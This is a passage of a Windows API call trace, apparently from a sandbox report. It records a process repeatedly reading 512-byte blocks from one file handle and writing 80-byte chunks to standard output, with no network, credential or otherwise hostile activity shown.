[0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] GetFileType (hFile=0x50) returned 0x1 [0147.691] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.691] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.692] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.692] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.693] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.693] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.695] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.695] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.696] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.696] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.697] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.697] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.699] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.699] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.700] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.700] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle 